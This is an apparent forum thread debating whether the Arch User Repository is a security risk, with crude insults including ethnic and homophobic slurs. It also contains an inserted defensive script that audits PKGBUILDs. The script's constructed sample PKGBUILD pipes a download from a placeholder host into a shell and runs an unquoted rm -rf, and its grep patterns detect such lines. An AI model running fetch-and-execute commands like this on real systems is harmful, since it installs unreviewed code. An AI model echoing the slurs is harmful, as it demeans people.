AUR, blessing, or curse?

Is the AUR secure, or a security risk? What is stopping a maintainer from inserting malicious code into a program and sending an update?

The same reason that using a helper such as yaourt is not recommended: you should read the PKGBUILD before you install/update.

>you should read the PKGBUILD before you install/update
Ain't nobody got time for that sweetie

A good helper will allow you to view them before installing.

layman is superior, install Gentoo

More like you need to get laid, man

...

Nope

I would be very surprised if anything malicious made its way into a PKGBUILD. Have you ever witnessed how autistic the majority of Arch users are? I'd never submit a package to the AUR, simply because of the spazoid comments that it would, without a doubt, receive. Regardless, you can simply give the PKGBUILD a once-over before installing. It's kind of hard to fake things like the URLs of the sources, so any funny business will tend to stick out.

i bet you floss your teeth too fag

I'm talking about the source being compromised. In other words, you'd have to audit the source of a new update in AUR to be truly secure.

>doesn't floss
jesus fuck pajeet

No point in doing so if you brush thoroughly enough

What is stopping an arch developer from inserting malicious code into a program and sending an update?

Them being bound by a code of honor, something AUR maintainers don't have to adhere to.

Oh, I see. Well, I guess it's no different than adding PPAs or installing software from outside your repos on any other distro. Hell, if you're going to worry that much, you may want to reconsider installing any OS, given the fact that Mint was issuing compromised ISOs. I monitor my system like a loon, so in a way, I almost don't even worry anymore about what I install.

what if they did all that work to gain our trust and they suddenly enable a kernel level botnet

The AUR is fucking amazing. On Ubuntu it's like with Windows: you have to search online for the thing you want to install. Then you have to install some shitty PPA. With the AUR everything you could ever want is there, and it all just works. All you have to do is read through the script to make sure it's safe. You can also see comments from other users, and can subscribe to get notified about anything important.

They would have to commit Sudoku for breaking their sacred vow. Not worth it to them.

Honestly the AUR is the biggest reason I use Arch. I wish other distros had something like this. Seriously, why the fuck don't they when it's clearly so popular? I'd use NixOS especially if it had an AUR-like thing.

who gives a fucking shit

AUR is nice. Someone could theoretically put botnet in there, but any moron can just read the PKGBUILD.

>not worth it to them
hope so

>check PKGBUILD
>all it does is download the tarball, extract, make, create directories and install
It's pretty easy to check. Even if there is a PKGBUILD that deletes root, AUR helpers don't let you build a package with root privileges.

Is there any record of any package in any distro doing something bad (when it shouldn't be)?

The AUR is very dangerous, you should probably never use it, unless you really don't have any other choice.

Even then, you should read the PKGBUILD very carefully; a typo in it could damage your system, or do really stupid shit like erase your home folder, for example (this has happened more than once).

When I need to get software for Arch, I go like this:

1. Check if it's on the repos
2. Check if the developer provides a flatpak.
3. Check if I can compile it from source.
4. Check the AUR.

Also, fuck the Arch way.

Source being malicious is really really rare, the problems usually come from poorly made PKGBUILD scripts deleting your home folder and things like that.
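The "just read the PKGBUILD" advice above (source URLs that are hard to fake, a script that only downloads, extracts, builds and installs) and the "poorly made PKGBUILD deleting your home folder" failure mode are both things you can check mechanically before running makepkg. The script below is an added example, not code from this thread, from makepkg or from any AUR helper. It greps a PKGBUILD for the four things the posters point at: sources fetched over plaintext transport, source hosts that do not match the project's url=, checksums set to SKIP (so makepkg verifies nothing), commands that pipe a download into a shell, and rm -r lines whose target is not a quoted path under $pkgdir or $srcdir (an unquoted or unset $pkgdir turns `rm -rf $pkgdir/usr/share/doc` into `rm -rf /usr/share/doc`). The PKGBUILD it checks is constructed for the demo: the package name, hosts and checksum are made up, and the heuristics are assumptions about what "looks wrong", so a clean report is a reason to read the file, not a substitute for reading it.

```shell
#!/bin/sh
# Added example: a pre-install PKGBUILD check. Not part of makepkg or any AUR
# helper; the PKGBUILD below is constructed for the demo and every host in it
# is made up. The checks are heuristics, not a proof that a package is safe.

# Write a constructed PKGBUILD to a temp file and print its path.
write_sample_pkgbuild() {
  f=$(mktemp)
  cat > "$f" <<'EOF'
# Maintainer: nobody (constructed sample, not a real AUR package)
pkgname=examplepkg
pkgver=1.2.3
pkgrel=1
pkgdesc="Constructed sample for a pre-install PKGBUILD check"
arch=('x86_64')
url="https://example.org/examplepkg"
license=('MIT')
source=("https://example.org/releases/examplepkg-$pkgver.tar.gz"
        "http://mirror.invalid/extra-blob.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000'
            'SKIP')

build() {
  cd "$srcdir/$pkgname-$pkgver"
  curl -s https://installer.invalid/setup.sh | sh
  make
}

package() {
  cd "$srcdir/$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
  rm -rf $pkgdir/usr/share/doc
}
EOF
  printf '%s\n' "$f"
}

# Print one line per finding for the PKGBUILD given as $1.
pkgbuild_findings() {
  pb="$1"
  q="'"
  # Host named in url=, with scheme, quotes and path stripped.
  uhost=$(sed -n 's/^url=//p' "$pb" | head -n1 | tr -d "\"'" \
          | sed 's|^[a-z+]*://||; s|/.*||')
  # Every URL inside a source=( ... ) array, whether on one line or several.
  srcs=$(awk -v q="$q" '
    /^source(_[a-z0-9_]+)?=\(/ { insrc = 1 }
    insrc {
      re = "[a-z+]+://[^\"" q "[:space:])]+"
      line = $0
      while (match(line, re)) {
        print substr(line, RSTART, RLENGTH)
        line = substr(line, RSTART + RLENGTH)
      }
      if ($0 ~ /\)[[:space:]]*$/) insrc = 0
    }' "$pb")
  for u in $srcs; do
    host=$(printf '%s\n' "$u" | sed 's|^[a-z+]*://||; s|/.*||')
    case "$u" in
      http://*|git://*|ftp://*)
        echo "plaintext transport (only a pinned checksum protects it): $u" ;;
    esac
    if [ -n "$uhost" ] && [ "$host" != "$uhost" ]; then
      echo "source host differs from url= host ($uhost): $u"
    fi
  done
  # SKIP means makepkg will not verify that download at all.
  n=$(grep -c "'SKIP'" "$pb" || true)
  if [ "$n" -gt 0 ]; then
    echo "checksum SKIP ($n entries): makepkg will not verify those downloads"
  fi
  # Code fetched and executed at build time cannot be reviewed from the PKGBUILD.
  grep -nE '(curl|wget)[^|]*\|[[:space:]]*(ba|da|z)?sh([[:space:]]|$)' "$pb" \
    | sed 's/^/pipe to shell (code you cannot review here): line /'
  # rm -r targets must be a quoted path under $pkgdir or $srcdir; an unquoted
  # variable that is unset or empty makes the target a path under /.
  grep -nE '(^|[[:space:];&|])rm[[:space:]]+-[a-zA-Z]*[rR]' "$pb" \
    | while IFS= read -r l; do
    case "$l" in
      *'"$pkgdir'*|*'"${pkgdir}'*|*'"$srcdir'*|*'"${srcdir}'*) ;;
      *'$pkgdir'*|*'${pkgdir}'*|*'$srcdir'*|*'${srcdir}'*)
        echo "unquoted \$pkgdir/\$srcdir in rm (unset variable => path under /): line $l" ;;
      *) echo "rm target not rooted in \$pkgdir or \$srcdir: line $l" ;;
    esac
  done
}

# Number of findings, for scripting a "stop and read it" gate.
pkgbuild_finding_count() {
  pkgbuild_findings "$1" | grep -c .
}

# Stand-alone demo: report on the constructed PKGBUILD, then clean up.
sample=$(write_sample_pkgbuild)
pkgbuild_findings "$sample"
rm -f "$sample"
```

Run it against a real AUR snapshot by pointing `pkgbuild_findings` at the unpacked PKGBUILD before you build; the constructed sample produces five findings (one plaintext source that also comes from a host other than url=, one SKIP checksum, one curl-into-sh, one unquoted `$pkgdir` in an rm). Anything it prints is a line to read closely, and a `.install` file shipped next to the PKGBUILD deserves the same treatment since it runs as root at install time, which this script does not look at.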

Why are Americans so obsessed with dental floss?

>3. Check if I can compile it from source.
>4. Check the AUR.

It's the same thing, bro

>t.pacaur